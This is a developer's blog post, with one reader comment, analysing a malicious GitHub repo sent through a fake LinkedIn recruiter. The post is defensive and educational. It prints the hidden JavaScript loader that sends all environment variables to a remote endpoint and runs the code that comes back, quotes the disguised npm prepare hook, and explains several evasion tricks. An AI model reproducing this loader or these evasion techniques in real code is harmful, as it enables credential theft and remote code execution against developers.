DEV Community

Vladimir Novick
Vladimir Novick

Posted on

A LinkedIn Recruiter Sent Me Malware Disguised as a "Pre-Interview Code Review"

A LinkedIn recruiter pitched me a remote "Software Engineer at a DEX" project this week. Reasonable comp range, tech stack squarely in my wheelhouse. After a couple of friendly exchanges, she asked me to "review the codebase before the technical interview" and sent me a GitHub repo link plus a Calendly invite for the call.

The repo was malware. It didn't get me, but it's something developers should be aware of — especially in the current job market, when a lot of people are laid off and looking for jobs or projects.

This post walks through exactly what was in it, the three details I found genuinely clever (honestly, kind of impressive in a "wish they'd put this energy into something legit" way), and the single precaution that defeats the entire family of attacks like this one. If you're an engineer who occasionally talks to recruiters on LinkedIn, this matters to you.

The catch

The repo (metabiteorg/NitroGem — reported to GitHub Trust & Safety, takedown pending) presents itself as a React + web3 dApp. Real-looking package.json, real-looking React frontend, hundreds of lines of legitimate-looking MEV bot code in the backend. But buried in app/controllers/frontController.js, lines 591–619, is this:

// ======================= Verification Setup =======================
const getGoogleDriveValue = async () => {
  const candidateUrls = `https://docs.google.com/document/d/<REDACTED>/export?format=txt`;
  try {
    const response = await axios.get(candidateUrls, {
      responseType: "text",
      transformResponse: (data) => data,
    });
    const value = String(response.data || "").trim();
    changedQueue(value);
  } catch (err) {
    // Try next URL
  }
};
getGoogleDriveValue();

const changedQueue = (value) => {
  verify(setApiKey(value))
    .then((response) => {
      const responseData = response.data;
      const executor = new (Function.constructor)("require", responseData);
      executor(require);
    });
}
Enter fullscreen mode Exit fullscreen mode

That's a five-stage attack chain that fires the moment you run npm install:

  1. The prepare lifecycle script in package.json runs node app/index.js.
  2. app/index.js requires frontController.js, which makes line 605 (getGoogleDriveValue();) execute at module load.
  3. The function fetches a public Google Doc.
  4. The doc body is base64-decoded into a URL, and your full process.env is POSTed to that URL via the verify() helper. (verify lives in a different file, settingController.js, where it's defined as axios.post(api, { ...process.env }, { headers: { "x-secret-header": "secret" } }).)
  5. The C2 response is compiled with new (Function.constructor)("require", responseData) and executed with the actual Node require module passed in — giving the attacker arbitrary JavaScript execution with full fs, child_process, net access.

Net effect: every API key, AWS credential, GitHub/npm token in your shell environment gets stolen. Then the attacker gets to run anything they want on your machine.

Three details I found genuinely interesting

The Command and Control (C2) is a Google Doc.
Most writeups of this kind describe a hardcoded vercel.app or freshly-registered domain as the command-and-control endpoint. This one routes through a public Google Doc whose body is a base64-encoded URL. Two consequences: the attacker can rotate the C2 destination by editing the Google Doc, with no GitHub commit needed. And outbound HTTPS to *.docs.google.com is universally allowed by corporate egress filtering. It's a smart move — the actual C2 URL never appears in the repo, so detection rules that publish "block this domain" never see it.

The eval-equivalent is new (Function.constructor)("require", responseData). Every linter and SAST scanner flags eval. Many also flag new Function(...). Reaching the constructor through an indirect property dereference (Function.constructor) bypasses keyword/string-match rules. Same execution semantics, lower detection probability. The trick of passing "require" as the parameter name and require as the argument is what gives the attacker full Node module access in the compiled code — without that, the compiled function wouldn't have access to require at all — Function-constructed functions run in the global scope, where require isn't injected the way it is inside CommonJS modules.

The prepare script camouflages itself as a Create-React-App build. The actual line in package.json is:

"prepare": "npm run app:pre | react-scripts --openssl-legacy-provider build --kill-others --kill-others-on-fail"
Enter fullscreen mode Exit fullscreen mode

That command is nonsense. react-scripts build doesn't read stdin. --kill-others is a concurrently flag, not a react-scripts flag. The right side of the pipe exists only to make the line look like a normal CRA build pipeline to a quick reader who scrolls past package.json. The only working portion is npm run app:pre, which runs node app/index.js. Pure visual decoration, but it works — most reviewers don't try to run the right side of the pipe through the actual react-scripts arg parser to see if it's coherent.

The supporting decorations

The repo has a bunch of small misdirection details that, taken together, signal a deliberate disguise rather than incidental code smell:

  • check-environment.js runs as part of npm start and refuses to execute in Gitpod, GitHub Codespaces, or Windows-11 VS Code terminals. Exactly the environments security researchers most often use to safely poke at unknown repos. The script is dressed up as a Node-version sanity check, but the practical effect is anti-analysis filtering.

  • npm install.cmd is a 3-line Windows batch file that runs npm install without --ignore-scripts. It exists to lure users away from the only safe install path the repo offers (install:fix, which uses --ignore-scripts).

  • app/test/index.js is entirely commented out — placeholder Mocha/Chai stubs for unrelated "Book API" / "User API" projects. Loaded by app/index.js as a decoy to absorb a researcher's attention away from the real payload site, with an unused getUniqueID() function nearby that "uses" the import so static analyzers don't flag it as dead code.

  • $null is a 244-byte file at the repo root containing npm warning output — consistent with someone running npm install > $null 2>&1 in cmd.exe, where $null becomes a literal filename rather than a redirection target. A small fingerprint of the author's working environment.

  • The two malicious functions are named setApiKey and verify. setApiKey doesn't set anything (it's atob). verify doesn't verify anything (it's axios.post). Each name describes a benign operation the function doesn't actually perform.

This is a known campaign

The fake-recruiter delivery vector matches a long-running campaign that Microsoft Threat Intelligence, Mandiant, and Palo Alto Unit 42 publicly attribute to North Korean state actors. Microsoft tracks it as Sapphire Sleet; Unit 42 calls it DEV#POPPER (with malware families BeaverTail and InvisibleFerret); Mandiant tracks an overlapping cluster as UNC4899.

Microsoft published a detailed writeup in March 2026 specifically about this delivery pattern: Contagious Interview: Malware delivered through fake developer job interviews. It describes the playbook as "a sophisticated social engineering operation active since at least December 2022, targeting software developers... by abusing the trust inherent in modern recruitment workflows." That's a near-verbatim description of what nearly happened to me.

The playbook is consistent: fresh LinkedIn profile pitches a remote Web3/AI engineering role, plausible stack, attractive comp range, conversation escalates over a few days to "please review the codebase before the technical interview," repo contains malware behind a prepare or postinstall lifecycle script. By the time the candidate clicks npm install, the trick has already worked.

The one precaution that defeats this whole family

I keep coming back to this when I talk to other engineers about it, because it's the part that actually matters and it's simpler than it looks:

Looking at code from a stranger on github.com is fine. No code from the repo executes when you read it in a browser — the rendering is pure HTML, the source view is read-only text. You can browse around an unfamiliar org's repos freely; that's safe.

The risky step is cloning + npm install locally. That's where lifecycle scripts (prepare, postinstall, preinstall) fire and your environment gets stolen.

If you ever need to install an unfamiliar repo, two habits that help:

  • Read package.json first. Look at every entry under scripts, especially anything named prepare, postinstall, preinstall, install. If any of them invoke a script you didn't expect (e.g., node some-script.js), pause and read that script before continuing.

  • Run npm install --ignore-scripts. Lifecycle hooks don't fire. You can still develop normally; you just need to opt back in (npm rebuild <package>) for legitimate native modules later, on a per-package basis.

This is the same hygiene that protects you from compromised npm packages in general, not just fake recruiter scams. It's worth turning into a default reflex.

Reference and IOCs

I keep a separate, reference-style document with the full IOC table, file paths, line numbers, the camouflage inventory, the social-engineering fingerprints, forensic methodology (how to confirm whether the trojan actually ran on your machine), mitigations if it did, and the channels for reporting (GitHub, Google Safe Browsing, LinkedIn, Calendly):

Full IOC reference and forensic methodology (gist)

Stay safe out there. If you got a similar pitch — don't clone, report the LinkedIn profile (under "fake account / not a real person"), and rotate any tokens that were exported in your shell at the time of install.

Top comments (1)

Collapse
 
peacebinflow profile image
PEACEBINFLOW

The detail about the prepare script camouflaging itself as a Create-React-App build pipeline is the part that'll stick with me. Not because the technique is technically sophisticated — it's actually pretty simple — but because it exploits something that isn't really a technical vulnerability at all. It exploits scanning habits.

Most of us have trained ourselves to skim package.json scripts with a specific pattern-matching lens: we look for things that feel off. A weird binary name, an obfuscated one-liner, a curl pipe to bash. But that nonsense react-scripts --openssl-legacy-provider build --kill-others string doesn't trigger the "off" detector because it's composed entirely of tokens that look like they belong there. It's visual static that blends into the expected noise of a modern JavaScript build chain. My brain sees "react-scripts," "build," some flags I half-recognize from a StackOverflow answer two years ago, and just moves on.

That's the part I find unsettling in a useful way. It suggests the defense isn't just "be more careful reading scripts" because the attack is specifically designed to pass through careful-enough reading. The real defense is the mechanical one you mentioned — --ignore-scripts as default behavior, not as a special precaution. I wonder how many of us have that flipped in our heads, where running scripts is the default and ignoring them is the paranoid exception.